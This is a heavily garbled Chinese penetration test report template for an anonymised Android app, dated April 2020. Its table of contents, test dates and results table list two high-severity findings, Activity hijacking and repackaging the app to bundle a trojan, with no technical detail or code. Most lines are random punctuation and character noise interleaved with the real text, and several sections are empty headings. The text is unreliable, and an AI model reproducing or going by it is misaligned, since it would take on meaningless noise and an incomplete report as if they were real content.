; w+ T+ s e; ~; I( ~% J w0 T) Y( U6 D: t
- b5 |. t7 c C- u" ~7 S$ S" I M. q( ^( V# n4 t) V+ Y) F/ r
0 G" @' _0 L9 n! z8 `! @ l+ y' T
4 V7 U. s3 w4 m% u/ r |7 G
2 k% u/ f! }, x) C2 M4 f$ K" H
1 b- {* q3 M* h! m% @: q7 R / ]& X# O8 o0 O. \, s) S
( V% y1 s/ C0 _: K+ @' K ) m2 J2 _. b( F7 d, Q4 Z
M) l/ ]9 K0 M
文档编号: ) B* Z: w- p* D3 K! B
2 E! z1 i1 L% |2 D5 T9 S# k
( |7 {! ^! M% V
+ X& v' n+ G( q
0 m2 j% Y, W& _9 u
. I4 |: r/ y" l( w8 f
$ |+ l6 D1 B/ J' J6 A6 d+ c. h: _
" X( S G( t; z
. a2 p' A+ C9 o8 n4 I' q" B% X2 B1 R7 |9 [, o) ~: p
" H! [6 w3 J" m: a. h2 v- B) d
# N% w$ L3 T+ D+ u0 l' x. l; M ( _- }8 b7 l4 d
) Y- F2 E# u7 E/ f5 ]
. V3 i2 S& D. [& x6 p6 y7 @9 A: R$ e8 G
% ?& ?5 w+ L0 N3 j! |7 G! Q+ Z$ B. _' l# v k$ a8 q; N R
; U5 X3 |! U$ z% B2 Q$ F# J$ ~
/ y( X8 a* ?1 x1 w: A
3 Z4 ~" C' q3 v7 \/ U6 f
3 ?* \3 V o- @6 s; n2 U
- U; o5 n) ^ a8 _) D1 O! h) P3 f/ u- Y( F) @: }- ]
' B z7 B$ {: d& L) o2 j
& e6 }$ ~+ |' P; g! G2 j" K! ^7 h
; N3 ^) ^" j7 @. n
% _9 ? r) y- g+ B9 `8 a3 o ) w% L# h! a: D) E
+ `9 y# V* Q# w9 R
1 c& O+ L/ t4 q( ^% r, x
& B `& g) ^: q! s
! @5 l- X$ E7 c, C+ W/ g" g# a
+ |. c( e) w" [
# h" ~! Q, t* N) ^' A6 i# b. h1 H( z+ q4 q% }9 C* ?9 {
某某某APP渗透测试
: p. X) j9 C( J. a( I) n. n# Z; \: e: K& \' o+ E2 T$ b, X6 X
/ R, N+ i( `; h/ G0 s' m
- L: \; Z& e+ J+ D2 Z
/ G) B8 N- C/ C: H/ l7 J
7 [4 r1 T% F* J3 y/ X/ y & [ L9 O6 E" i
5 h( p: m7 j# { c% v& v
* |, T! G8 u! C' Y
& ?# d& f m# s
2 ?+ Z. I) B( x8 ^6 d
- h$ w% |% c' } c 3 ]( k: F. {; E8 @: X
; q5 ^, `' k1 j! N* o* f$ t6 }
1 [* l7 o& ?; d) q; ~
- p! G% i- X' O 0 i. I4 H8 e9 ~+ x' q- T9 W
- S% G$ o r [7 M5 J- Y" E, _! c$ G
* j, o7 J, ?) V6 [& w! h q- }
* n4 Y6 L- e, ^# [1 j
A' Y5 ?3 n. [: P6 T4 R
4 I" B4 U$ p) k/ J. i, O, p
- ?2 U# b5 e8 A' X$ G- p, x& Z
s6 y& B! V* n; R R- p. k: m
* D' f! h' C1 l3 X) E
9 [8 W$ B: |) k+ p) o* F3 ?% T
, z8 m) W( e( B' ~# L8 k" P6 b
$ E) Z0 c: R: s( V# f
$ T- @0 r! ?7 }) m& O5 v' Z5 g
5 g* V: Z5 b* S* [# R+ ^5 F, \0 J 技 术 报 告
: ?* A4 q% @! Y2 O; [1 H) E. z2 t, W0 ]" M+ l. R
6 W: L" \) n3 F6 X! \# s
+ ^& `4 J, l" p ) f) u4 W) F" c0 L- \0 W
8 {6 z9 u X* Y& q9 F0 n
% m# X; L, ?5 L# I( H. X& w
7 I% O: ]4 L5 q }& P# V+ D
) f7 X) h. f0 k* ^0 b3 `6 M
& O3 N8 E, Q% K# w( m. M# F
5 j' Z# Q- S! R r
. j' S6 k" K5 v 8 F* n1 U5 K% G, P0 ^! T! L, v
: N, w- N# G8 d* ?3 O1 h) E
; f; | f* d; G+ R8 s3 L! K( c" ~, g7 O3 N! T
+ N4 g2 _0 \/ q3 ]
: e9 @$ F" v- G7 \
: P) M; e B+ {. I; ~8 z4 Q& W' y% i. Z {1 ]) X% ?
; v$ B: k2 l1 r) N4 y& S4 Q( J- g9 Y N# O5 a
: w. H1 U5 L; u' c6 d: n, e% F! R. M( v
3 M1 @+ y4 D/ i6 `
/ R: m) G, J6 A `7 N a3 \
; c* D7 X: M% s/ h9 G" J
* y* N4 k* |. k6 P z / f& O/ V5 P" z8 d- t! X5 R
9 y" m; `% `8 r* N
) }# t( W) `; r/ r* F1 b) k: K& D0 }. s
. G& x/ c3 ?8 h8 C- U
5 Z& Q2 f: a, i9 ~% S4 ]5 V- R ' B7 A$ b0 M4 G# `. k$ ]
, I2 n2 ?& c; _4 o3 U3 N
& A( r/ ]' U, S5 d4 m( _7 L
% ]& U0 s" b+ d% L/ B ]0 z
# }( m1 \ t+ s% `- V* v
( C: \: \4 s; J+ |
0 p9 w! p9 S" b! z% ]9 N
, j; B8 @- ] {% a% x 1 v$ v! C) I* \2 o5 Q
, A5 G/ Z, a1 u$ j @
. i+ S, [4 F/ C( `1 a- u9 a7 R0 d' O
% N$ e7 V1 R7 |, M
/ m& e1 s% \- r7 ^# S$ v6 y! t, H$ f6 u) h+ h9 G- T1 c6 Y2 Q
" r# B& ?4 l* J U' V9 q @
% T( w4 B9 I* S1 u
5 j: M7 Z+ v/ S6 t) @3 q7 n7 r
" o g' y& p6 D5 C+ k! v2 y: I( ~
3 @* K3 {. h: \: T! O; K- s9 ]5 A* x! `! c
/ J- p2 y' U/ b% B: _$ g+ ?
4 R4 q) j$ k1 o5 ]0 h/ r
C" u! `# H5 x) b2 [3 J7 K R0 ~0 O: j
1 e, C$ B! g% T4 f- T' r0 A, d
( r$ m( Z5 s& Y- `6 i Q0 H" R : ]' ?0 z) u) v% H
7 M2 z0 k9 t9 r4 g9 ~$ V& |
- d2 x! {4 ?- R
) U/ {4 V1 M* ~0 t1 k, a! I ( a# S3 G5 r: j% J
. j# H3 a& ^1 S( R5 b( ]- x
( k% G' W, O" Z( s# B/ o
/ A' f8 o; J0 q( k: N0 `: E2 B
! l. D1 b7 N& ~/ F& b9 ]' X+ v! b3 z) U" q
) q" @( N2 E* F' w$ p7 j
( Q+ f2 W8 n: R# W/ K/ o# T5 q
: u+ X- o2 t* w" a! z- W6 R. N8 {" e! z2 n& v Z" f' M* h
5 `2 w' u l; W7 x# P# ]
], U4 z% x! u8 A3 x
6 [" [/ y1 c# L6 F9 q% {# |' ~! [; P/ M* ?7 U/ o% k9 [- ~* }" ]
3 g0 { y6 ^4 Z. o7 c- E9 P1 w+ z/ ^; A7 x1 f( G% O3 a0 l- ^
5 N! F" O9 p9 d' z" y+ N _
0 H& ]0 M5 x+ H8 f
& |- [9 _6 U5 K5 Z9 y. t& b4 `
( b: @1 g" @' F, w( G
3 w4 ^- B, I: }- X/ Z5 T" }0 \- }% d' W! m5 U, a
& c7 m( `% E4 a6 H$ e4 f! B' L0 d
8 L9 S+ n. V& K3 o5 C
. l" F8 v/ J! I* c! T- B' N( p1 m; g7 E* B8 q# k* i D
$ A. r* Q- b5 w. _" G( R. t& Z) P {
# k; \5 A6 X* Y
9 H- B# O* ^9 S, P
% C2 ?! }* W5 }5 r: Y8 a0 ?
0 I' k3 g5 E3 J
& z4 D) A9 t5 ?' B* |0 o( `1 ?" b3 z$ H5 @
4 e; l% ?$ _7 k6 Q2 q f" Y$ q R& w8 h8 a8 O
# v$ R2 Z5 ?+ x' p
* F2 Q/ C4 ~0 a9 `' O% ?
$ U* ~/ M x6 o- q
) b9 [, w5 o- c5 T' x
; E& O$ e* y" @; P6 u7 ~. R$ A5 G6 G. K
. u. j% c/ L2 f. R `7 @8 i" V' i; f6 s/ H
2 h6 ?" S) Q; R; M. j
" i7 `4 S, k. q8 {# s; @
; g s0 S0 o. H
' f: j- n# Z% S3 K) }7 `* d1 y1 R 5 C, y; ]- w$ f7 z4 `2 g) C
) F, r( |& G$ v4 x# x+ ` 二〇二〇年 ) N, ^/ B& h. ?1 G! z9 t, I# r
4 m% ?$ D% {% G1 M
4 |0 e! C& ^3 `1 w9 S6 w1 Q! e1 i/ y# v. k; S, r
/ w8 g+ t L" H, s! |8 m2 C! h! n
9 o8 I* I0 B5 n# x2 X7 t* R
- C1 s5 P, g/ Y
# s/ a5 w5 ]0 ~) ?: G& r
2 v. T4 e' g2 {& j* O+ o: T
2 u1 y5 v! b8 I* h1 u 9 M B' o( h: }! b; i
7 A# V+ E1 Z% e1 F. F; ~
; r: g9 ?) c# R& t, l c# ?. n/ c: A
& O- r# e) n+ \+ V2 [' w# F3 p+ o. I& L# |
7 |0 \8 i. Y7 q! S3 v# N3 N
- J# u' `: [1 T1 W* X3 I6 }
4 A+ a0 ?0 k) _: }4 q, [+ f6 |# }
' T7 j( [% W0 B* m! I+ C w 3 v8 U( h! w* O5 X
i2 j! x, w8 n4 R' K2 s
目 录 - d" K9 ?0 @& M9 G: |
4 N$ b0 _* d+ c: g
( {2 m1 V- L! i1 d: K& q
9 g- h; _/ }- A4 t+ }
- O0 l) L! ~, v% t7 W3 R3 v5 |! v- S" `1 T, D" n
' g' P: m# j2 r' G
$ [2 t J1 R& J: u1 {3 r 0 b( k# n) K& X% ^) i' r9 C. @6 O1 D
9 J7 j- Z% o T1 O5 Z9 p
& a- W4 s4 F( c& I8 ?; K( e4 b# o8 f* M3 o5 ^' [- w
: n7 E% ~5 Z. k- [; P
8 p5 X3 Q* ?8 |1 ~" d
1 概述... 3
8 {8 K7 P# l: x$ r" ^' R
8 {% ^2 i" E8 D3 A. l
3 \& v) Q2 k9 r! L" E0 n0 o
' w6 U h! j5 P* K. B* P) [ # F9 b, Y- h% ~: R: x
4 k/ h$ U i E5 R3 z 1.2测试时间... 3 % T) i: B$ j0 }- z
7 A' y4 A, G$ K/ n/ L ]
]% F- A" c! U: P# g+ B# M- |! \- f7 N4 j; G4 t' \8 z0 f
. |. J# J# k6 u9 V7 N2 g: ?3 Z) g0 `$ n7 n+ ~3 h, A; |
1.3测试对象... 3 ! R3 y, L9 F# S7 {) V7 r+ b, t
0 I) S, @6 D. h- }( j* `, ~
0 J: {5 O2 V7 a, z5 V9 n R2 x: ^1 Y- N
1 p. n5 D) c% O- v 7 A: A+ M9 B( z+ c2 L( m* t7 `
# N: z3 g$ y! Q& ]$ c# @" S
1.4测试结果... 3
, g; {+ Y( Q/ e! I' F0 O9 H0 v9 w& D; F5 w7 @) K. I" @
/ b( l$ H: F+ B8 h0 D& m
: p, w: w) u# a* d8 _5 e( m
) X$ `9 A# n( M
4 \* T6 W; X* M+ O( S3 Z 2 检测结果... 4
+ k }; D# M G( z) ~
/ R- C. g$ C6 p& @) k( L
6 P3 A' v, f) p8 |
4 G. |3 e9 v, R9 l# X Q2 x" Z 0 j1 f3 q% W6 p8 O7 r
3 ?* P# ] B" N/ n 2.1 某某某... 4
: }; `1 o& R) f8 x3 k: y2 i9 c
3 ]1 d$ d7 x; E' z' h5 L' y
# n2 |6 O- F6 P
& w) f3 ]& U; j3 ^ / [4 O2 t2 q2 O* U. B+ E( [7 U
# A6 L# k7 R8 G2 ~7 g& l! n$ [1 c 2.1.1检测目标... 4 $ N- B& L; f, L# D
& s9 O' U; p& G! O: r% E7 _3 r
; V! k# [% N, }& |3 a" I5 ^* m- b' w7 Y: q$ T- \) Z3 x( U. S
. C* V& }0 A1 k3 [8 F
9 R% [- Z. i5 J8 N% L" L; N( y* X
2.1.2检测结果... 4
/ K1 K: V* |! T U: P6 Z E+ F: r7 z4 n3 A5 i7 C
- _; H- X8 X9 g! y
/ f$ A& a2 J% S4 |, b% H
- f3 X& \# ^6 ?. K4 b- i4 M+ ]8 m0 [, P( y
2.1.2.1. 4 % C2 b3 a. Z4 A9 f" }
& |; L3 P7 o- E2 t$ P
: Z. u! l4 A x& }: l# N
: g# s a( }$ K$ a- x 7 V J3 Z- A) Q8 p- V& k
1 T9 r; R2 |$ M 2.1.2.2. 6
% ^( n1 C3 ]2 _( n$ _% Z; R: q+ K- @4 I+ N
+ n U2 L8 M3 ^2 n, k. x7 J
' M! D8 V, [2 G6 B5 M' N3 T7 r
& m2 D8 n0 M' i- V& U# D( \
# N8 b3 i G7 a" t+ ~
! V2 Z$ ~( u5 D3 [5 P3 T) f" g
4 l& Y$ I7 K& w4 R
7 l% \4 e2 g. y7 d! Q: |9 B0 J& N$ |9 }# v
1 H; T4 @8 T2 r
& w/ `! ~- H2 b$ `$ S2 j; g
$ e1 Y" j4 l. H; Z' {7 [6 ]# T3 ^2 _* R! W6 ]
, `. _& Y0 I+ ~ z7 C" @& m
! T6 A( D* C0 S. {" ~
; P3 O# a L5 P3 J
) t" t5 h, g$ V' G/ w+ f
$ x# W, m* z% {: o/ `) j# T, w1 T5 f* |: d
1 概述 " m1 ~- u/ W( N) o
' d/ n% G" V; a# W4 t
& X# z' r# i, G. E( K! `
+ q( I8 k6 h0 a" H B1 b
5 C3 y8 K/ j y( f7 a
3 [4 ?1 Y3 C7 h& B
1.2测试时间
6 ?/ n* ]- O& M+ S% L( A
b3 N& n6 T- ^7 B* t6 Y
' \0 ^( f$ `. {% s. Q- t! S
/ W! F2 i) l6 }" ~3 _
* t( }) Q) Q7 y' y
3 _4 G& v6 T, \; b8 a5 G " w$ h/ [, _ x3 K
' k* z' M) G8 k0 e ]6 a9 p- O) b
+ [4 w2 \9 M$ N9 b8 `* r* O- Z$ L- \9 U0 y5 E& s
) |8 Z' o! k/ H
8 s+ u! ]4 u/ \$ p: s
" i, z; K1 z: I- n
/ o R) O, l& }* g) k 渗透测试时间
2 ~- A! C' v+ G3 ]5 q5 Q( B! {6 Q! x! Y; P, n
8 W% C3 A& j: A. K7 }; |1 m/ {( t- m
5 {; ^. P o2 M5 D
| : z/ _. g% L F- {- V
, j) [6 I* n H2 O; q
8 [+ I- a6 V3 F( o* }
3 m( j7 L; M+ x 8 P$ J0 m& r+ W* j5 K
* K' p. b: X4 u, E/ O3 K8 y$ H0 Y
" d7 V0 t, m8 ^/ V
3 k1 F0 B' O% z& t
/ t- Q4 x" J5 I+ g1 f
2 P( b* v4 D8 `0 {) V$ b9 q2 V: e 起始时间
9 [" ?! w+ a5 {( @+ G+ b: {0 p0 F
. e) j( I, D* X: b M6 \! I . Y1 Z9 o. d& H# y9 w' i- i
' x0 x! F4 i/ v2 |3 l |
0 b7 d) F1 v& S- S; L( a0 P5 d$ f5 j( L+ j
+ b" M. }, ^8 Z( }, ]' a- m
6 Q; k6 A# B" n% R# y/ @
3 I4 ]+ }& f$ W0 ?# Q2 A- A$ @. [% G" A3 y+ [: q6 w$ z4 ~! g
2020年4月6日
) K6 V; _7 T5 T& m3 k
. H/ ]8 j+ G/ Y/ P, b4 g 8 s% g0 G% C7 ^3 N
" U/ z2 h1 r2 A9 D1 y l. x! x |
3 e, F8 n* Y0 D5 E4 U+ ?5 K" d' t1 R- b* h U2 b l
0 I+ f: E* |) {; k( H: D6 I/ [
* }; Y% r% Q2 R
8 B* p/ Z! \8 F4 y# i& z
3 a e. _% ?6 ~& | u / A* A' w$ A- N+ S- r! z. k/ U$ i
. s- F4 I7 ^$ {1 c
( @0 m r- ^% J. H1 ~! S6 ~# w$ B# l5 M1 l6 I$ `. D$ N
结束时间 8 R+ z9 I5 n& b* \. s; a# X
3 O. Q( z6 g) b+ I9 l
$ I' J# E, n4 L
% }0 S( [+ J* ^3 ^ |
$ B% z7 S% [! d8 }$ R. O) f& |4 V b. Y9 {5 F
8 Y1 e6 t. O$ R+ F3 P
- C' V6 Z' _0 R7 ?' J 6 Z) ]/ q- q; g: L0 t
8 j: X0 ^/ K; \ 2020年4月9日 - S1 t' g3 @7 h' {+ V
. q! f" h8 \6 O/ D) F5 B
+ l9 }) ~6 p% G) |
, v4 }$ k/ J) b- z. k2 r |
1 B% L0 {! I1 O5 p2 E0 R( H3 W5 P4 q% u# Z7 B1 o, ]' u+ |7 X
7 M* M, j! q7 A h( _' l# V
/ Y# b! @0 f( C
% G d' K$ u0 t/ q/ P
/ q( N0 l, q) V( I: W& J2 p( X
! o: }2 C6 G% ]/ l7 r* i
) A4 a( R8 S. I" X
6 n9 g. [: O0 ?( K
% B+ M3 C4 n' m 1.3测试对象 , J( {7 N, A1 L$ y
3 L5 y# B! k7 q( `( p1 L R M
; L V9 g; {9 w8 Q
+ v; b/ b1 o: V+ v. n' G
7 n0 H1 x' ^7 `% |7 i1 J8 S( @8 ^' |
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: " S! c5 }. M2 {
7 C4 S, B* F: D+ Y; }# K
& P3 Z9 W+ u- |. ]0 X( Z7 h5 Z* B. ~8 N6 `$ s- N5 ^
/ W' @+ v$ ]" X. e# U+ {5 E
' U# i1 C7 _$ A# @4 m7 V 表1-1 检测对象 + a3 {% f; t# @1 H7 Y! n
. K. a9 ?! E! t3 J
1 l% q9 B7 `3 ~7 Z- [) \# c1 R6 ]0 }% e/ X+ @1 b
3 q+ W) P! ] F3 q0 H/ ^2 }# ^+ e% |6 I
) b! F L7 p2 {1 B: h
& v8 W: [; M. W) _/ a
, E" t; e2 e( {1 a+ K/ W2 `$ }- a' D5 }) D6 g6 ~
7 }% g5 f" F0 D5 V9 W& o# z( ^% K+ V0 f! C' ~0 S5 |; n8 L! h
6 A0 s9 T9 `; T8 n. _# j. l
7 @: m1 W5 O1 z 序号 4 z3 b" a6 B2 z2 B' s
! E. S& G6 w- `; l9 ]
* Y( C& U! {. O4 H
5 I, s5 V: W( ^& a% H& o | ; ^# j0 p E* b x" z
1 V6 i) L) v7 j
3 y# m2 j O7 y' U7 ~
1 M. F) d3 |7 m; x1 E1 ?2 I% ]) h 1 d( ~# ]' v4 r
8 P8 L. _ O! i3 k- s6 }9 h, R 测试对象 * z+ L, Y. D4 e& Q
+ d L4 l5 `2 F! d4 i C% a
1 M" K* a2 k$ }" E& a* K r0 A6 r2 X0 G5 Y
| " F/ K6 h3 P9 w2 n# S! b
2 w/ `: p8 u% b3 \& X
6 y; ]$ c. `+ r6 ?8 o
+ w$ a# ?( r$ P. q, p& }. ?/ T
6 J9 m- K# S' p
' o0 b9 M1 b+ ~* Z: B3 d7 @4 B 测试地址 5 g3 A; V% \# B5 P1 K
: Z% t! R5 b# J5 N( ~+ _- c
% F% S+ q0 d0 o2 H6 L; i/ x! \& W- j
| + H. g4 o2 O3 [: F1 X+ }
, L- B5 W2 C5 [, C # Q8 ?6 q9 q5 C5 \
8 t8 b3 {5 q) A
; s- b! S4 C2 J R
: l) S0 {/ s, l6 D& Z, P 安全漏洞
" H! J$ T, w Y
& Q% i7 J4 E3 |- C - i4 c6 a+ C1 b6 s+ ?1 Z8 E: e
, h4 B1 X' _% n% A6 _
| 9 n; ?2 [" h4 s+ }, l
' z' Y) G [! I& Y
+ `* `& P h+ I4 f' ?
/ s# E' k! ]3 Q& j 2 C8 a' D0 e7 m$ X% v
' `1 I+ g7 a' }" ]9 w3 L6 _/ e , g6 Z9 |/ B% R8 B0 {: ~
) e' }# \; i% `* B $ A! Z+ [% R9 h
) S- n4 {$ v9 {& V( e 1 4 V- i" N+ G* e% N r: S0 Q
2 }1 k# ~5 r$ s' G+ }6 l
( g0 H, X1 O* { U! ^) V* k7 m# d1 O/ `* j% P) ]
|
" z2 a; c5 s! t' G/ @$ a2 b. g! |
3 u# D5 }: Q8 N8 K( v2 Z5 [
; s; H7 V8 L. f5 \! e4 a7 V r
+ v" s, g7 Y' P6 `
% A* _# w" F( F0 N% e# s; Z 某某某安卓APP
. D% L# B1 A8 d5 l
! P! d- ^. P/ H5 O3 @0 F ! {! w( Z; L+ X
" x. F' d% v" v0 O | 5 i, @9 _# R0 L1 m. S$ \. h
" s/ c- P* t! C, x' m$ d5 S
5 P6 P$ ]0 U0 v( l& k- M" m B/ f) V7 j$ l3 Z# D [: a; i; t7 \7 A3 |
# _8 d. O! z# `: j( J
3 `8 B; g$ W3 |: c7 {
# y4 u; W0 o* F4 E$ t r& S3 J2 q, Y( I, T+ G a% d4 |! w
1 g, q. j1 R W( m5 W) b' {0 ]
9 {) J; X% ]9 W Y: W | * Z# n# Q3 H" k/ G# u6 A. Z, B0 W
+ g; X$ V' a5 f2 X
- G, Y- ], B' N; N% \: M" e4 z
+ p+ r8 h& s6 x. |& h / Z4 x& p/ r0 l/ Y8 o
- G1 j7 n% _' {
2 ' S: c3 n y) f( F8 U
; m' z' Q; v# j. g 6 f& `9 k; j1 c" w
+ [5 Z; V$ m( v+ V2 j* j | / q# K7 l& h0 ?' E( Q
$ D( q+ M0 G1 \- A/ @- C
7 r5 G1 [+ `- g2 ~2 N% k
; c3 |$ r# n \# U1 f
# }* V/ Y4 n6 h' h, t/ U6 V' L4 y& p. n$ Y9 s/ q0 i
; Z& T- } n% d" B) D
2 {4 S# J( m$ d 3 Q6 a: B$ M2 a
' ]1 [' R" A6 j9 s l, n 1.4测试结果 " F# _5 s% z, N! \
1 ]9 Z2 [3 w! e( d( e3 Z* R
9 ?0 Y) A2 g+ m N6 ?- Y
) k0 }1 Q6 x) v* [
8 W- `# w/ @1 F
6 t7 Z$ }! _' H8 v( N3 f4 q 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
4 ]! q E6 W- o* Q G" P8 L: c/ f
3 y" }% C: O2 }4 d9 N! E/ V
% V# ]/ l- Q$ s; e% m/ S2 V7 | G; f
n+ t, @# \, U# z: s( ]
6 @ f! m( i1 \
3 w9 [1 q5 ~$ l) L0 H0 ?
) v9 v [) K' W& s4 e1 `9 Z3 m% f5 S) u/ o
. d8 \ i7 _" ?1 Z4 f3 @" H9 g
8 |1 A* q k, r9 S
" x7 B# w$ @5 J4 H6 r2 A( G( E4 W4 J& s: p; z9 Q+ @
' Z+ x* W3 M4 c% D2 T7 f2 X
/ D7 O9 E6 O- |) B
) X6 f& H, P( w' z3 t1 \. Q( ~" Y% c' [5 u" d" D; v
" I' I. o5 I4 [0 L$ g$ p. P
4 V' i% {6 y& V4 a6 r
& Y: X X2 _& e3 X; e. m8 I
8 ^9 L& c6 p+ ?- {. d* f
2 p0 c/ r% S6 G7 Y0 Y5 N r$ M8 N) t; m3 r8 O1 @- f
序号
1 d e' a5 j4 f6 c3 |) p. J+ h/ d# @% n$ k" w3 d7 i# D
, y! B m* _; C5 w" t9 g, x, ~: G+ \! N* Z( @- m
|
" ? y7 [! ]7 b; D, U r- O4 O* D0 J( O4 T2 l
& m1 \2 I4 e3 U6 t- S Y
1 w2 W( ]; T: q" d2 J 7 K g9 L5 ?+ w4 E1 I l# B$ ^2 D& _
2 {/ d) C A; C6 i3 e/ X 系统名称
8 K; M* B5 \6 {! \! w' t1 x8 w9 ^4 L( Q' W0 R
v1 ]$ C0 D7 W: W% L( C: ~6 g0 e
( v0 V% L- l+ L2 h: F
|
5 @# V) p/ k' H3 j! \2 ~- w* A7 B) T$ E6 o/ X. u
5 o4 ?! T9 n) g/ B
2 t( k* |! f9 Q: f7 y/ j
l! \5 b z- i e, V
3 Y3 M9 L" t! e1 f3 A 漏洞名称 0 X* p5 z9 t# x K6 U
( u2 a2 j2 z, ?* M" J
; {" d1 l( ]! n N; `; |% R
- @. b/ r" g L
| , [9 }; Q/ Y) f0 E$ {; W
' `# @/ H5 Y, m: S/ j g/ r
- `6 I: t+ i9 m$ r% v
+ V+ z3 ^$ W) ]4 \2 w0 A5 N: S $ |$ U# U6 {: G) {8 }% a5 Z
# }& b& p/ R& X3 e 漏洞危害
8 }& L7 n0 m( i% J! q7 }1 o7 B8 H# n. M4 I6 F. Q: ~) G
7 j5 p$ M/ o _1 ^# ]. Q5 {/ A$ O6 r9 X/ A' j: H1 R
|
2 n. Q# l( Z, B& |. l& x- f
0 Z" Z. {* s7 _' S% i: o& B, d " ?8 v; J; |# A: {1 S7 j n8 D
; c- j5 F- y: {4 K+ z
6 d- A& B( O( _/ x, @
( g- T# v0 O4 Y( ^9 Y7 Q% U 修复结果
+ B2 }6 l) H$ d4 k5 U- g( N$ K' c& K( I. I; \
+ ^7 G; A0 N- l% [5 E( K
7 Y% d6 Q" f8 p1 B1 ~% m1 Z' }
| + P/ B# _6 F+ I% ^+ B$ p
% _% Z5 k" h+ e% c3 N4 @( `
: J' Y- |# s2 n4 T9 Q( E; `4 @3 J g( i# V. z" @5 _2 j
9 Q" Y h* f; r C$ M j6 M5 Q9 Y/ [
' M) l1 m. d1 a7 T2 A$ {/ M' [: p- O! Z+ `/ v! [4 [
8 f# k% F0 U; l, q% ?$ z' }
2 w1 Y( s" U; N5 s* J5 v 1 $ F' B0 c/ g# o% O2 d* V
$ |# C! f8 p6 X4 J0 Q) k" K
# H. W0 w- d5 c# `( x6 p
\. d4 A* a5 T9 n! g' e
| 7 z; A2 U, Z& [
. K* f6 Q1 z' J6 o% J
; h: B0 l9 R- d- _) Z
: {1 M0 N# d8 n! B& B , v q* Z- M& E: m8 l4 W
( H Y3 n$ I% ]2 t, _- c/ O
某某某某某某APP
9 a8 | g3 F5 I0 [- X0 z$ y# k3 N4 j9 [ x! d
! g4 ^9 h% ~# x( u& E
! F& u! p& z; I |
# ?9 Y5 S' P: \* T9 l+ I
7 z" b3 M3 y: S2 z 9 D0 B8 e3 b# N9 }
5 m0 z B5 u: y ' S7 @$ B" u. A" Y- Q1 r4 o
; H- I2 d0 |7 Z A# e Activity 劫持 ; L4 p8 b9 y: J9 O0 p( z
2 `" c+ j* E1 C) b+ v* n5 n
+ _% f, \3 r ~* U# `: S, x" Y( ]; @7 j R& {& }$ u5 c
R6 `/ E0 ]$ ]
$ g* s$ \3 D3 ?& O& Y/ q Y) T3 m9 q * \! I3 q3 a& H, G1 ]# t* d- e
! [: h* {& A3 P, B- [; C' M$ ?
( V% ]! m. r9 F y8 {5 u, u( F1 `' S# N3 I
| # g+ ], L" {' B
' f$ e1 E) U* s# i
( ]& E7 H; u' S, \. u
( Y4 w- Z$ e9 K& P& M$ q4 M# N ~
7 f- a1 H G% k5 T
7 }5 i; z1 f2 D- f% \7 J( J 高
7 D' C5 j0 {( {: \/ D2 p7 o7 M4 y( l
0 P* v O( n( s, K0 W& a- Z3 V
, w4 b+ |0 m0 ?+ k8 m0 T6 i. y7 Q
| 0 W" J2 P0 B; N( N! x& g6 e
1 c& T0 V2 M% s
# X" A3 W$ ?% O6 y. P" l' F' ]8 c4 ?' d7 {+ w) p
4 I2 c0 q. ]8 J% `6 r$ ]$ m/ D9 b. R
) S9 G; l# Z* [7 ~: Y
; W( b2 a* F# @, [( u& Q7 H, s: C2 d; o1 X
! [% y! @7 `; a% \; _+ G- r2 Q
* E( j( R5 t @! m% A2 r0 J |
7 i4 _/ S: V* k* x
% C, f0 H, B) @) |) o
: D' m, r- A3 m! y
6 P0 F; I( [3 ?' j
1 t& A. L3 o; G; f5 B" H
8 {. l( t1 q" w0 k4 y, D + |- c* e3 p4 j+ w
: ]; l, a4 ~3 q
' l( R/ W/ g1 e) n- d- R
1 ^! l! a+ m% O! i. O o/ | 2 4 a7 o8 v" a7 y$ i
9 a, F* b/ S( P % m/ A7 L3 O. n: x
+ Y2 `5 s" M. U( V% Y
|
8 |$ l' _4 y3 B8 P/ u8 P. _
- e/ J, L) [" a 2 c% f& p; P! e/ R" d0 K3 g" z
! }& {/ U% E9 j! X
/ ^& d6 f5 L6 E! Q, k- d# {& S. m* q
4 h& G- W% a L# c; G4 A2 F8 J 某某某某某某APP # F6 `$ J) z: y
1 T9 j' t6 A8 n& B9 D
4 x: H6 N( H2 B! q3 H
- I$ u* P5 M3 y& O- o/ F | % @/ i! Y6 S' U3 p
3 J0 q6 B" J' m1 J; a
7 D6 z3 X$ l+ e
5 _! U- I$ `, P- p
; J1 a8 d0 t0 ]1 ]3 R, N1 e
5 t5 w9 O2 }4 v& x8 E' B 反编译二次打包捆绑木马、篡改APP代码
; o8 n% y, ~6 z8 @3 h
; s' M* B2 ^* \; D$ X . |" U. M* L% z5 b
0 z! _; I* v5 b
|
) y2 m' n3 a A% {) {" k: m2 |! \
% u5 ], |- A( T. ? 6 m# f. I6 |* N' ~& D0 }/ y
f- f5 M* o0 [0 [8 G
w- C) Z/ q" k( @
: S# a, l' `4 {: }0 f b; U
高
7 [7 x& h1 A- i7 A( [/ @ l
% F* z" n6 J% S& E
3 P9 k3 L# H& V$ g, N" ]
" V' ]# D9 g! H3 d5 o5 ^ |
- ]" K% L ]+ u X# W R/ r- @' _; Y- C" c C! g7 N' j
( v1 A- Y. o: a# _9 M
; h) W O3 ]- p0 r: ^
6 c3 J" @+ \& b; i" r3 M
s5 d: r- N5 f+ [2 C. |7 i2 f
$ P4 ]' Y1 r& F+ r5 j* \# A, v$ M4 g
, `0 ~) ]0 Z: w9 w4 B: F& R
0 V) E0 b# Q: @+ q$ u |
# k- n$ G9 }. [6 v5 S( g) u( ~' n9 D3 E% A+ Z- p- t+ v+ }( E0 j
2 u$ p0 W4 Z- V( v# L
8 {: J% B9 P- f( g4 K! P 3 \! S: [, U, i! M
1 B7 D* M- }3 v/ V9 `- p
: N* G% I5 x+ e/ A7 s$ I
- c4 V$ q& p4 Y& z( v# ]- U
# O% W h+ x2 F+ r
O; L- a- a, Q' m- S- q1 d! v
* K* A7 H2 ]* d# G4 ^. G7 g% Z6 ?% e: ]/ S. l- e
; C/ i, }9 V5 i% ?
: i# L' X% z. w: h
$ A+ P# U# _! H# r
C9 _/ r, M# d8 D5 t" V
/ c2 d# T0 P$ ?- |' L U( r' d% n+ D% I8 k) N
表1-2 测试结果 5 e* `0 o3 }; R# G; e M- {9 d
0 U( z; i! h1 C
+ ~$ p6 }; W5 ?4 y/ d% i% v
7 X$ C, F3 O5 T- }- d) l& D
6 o5 N, p+ Z6 W8 E
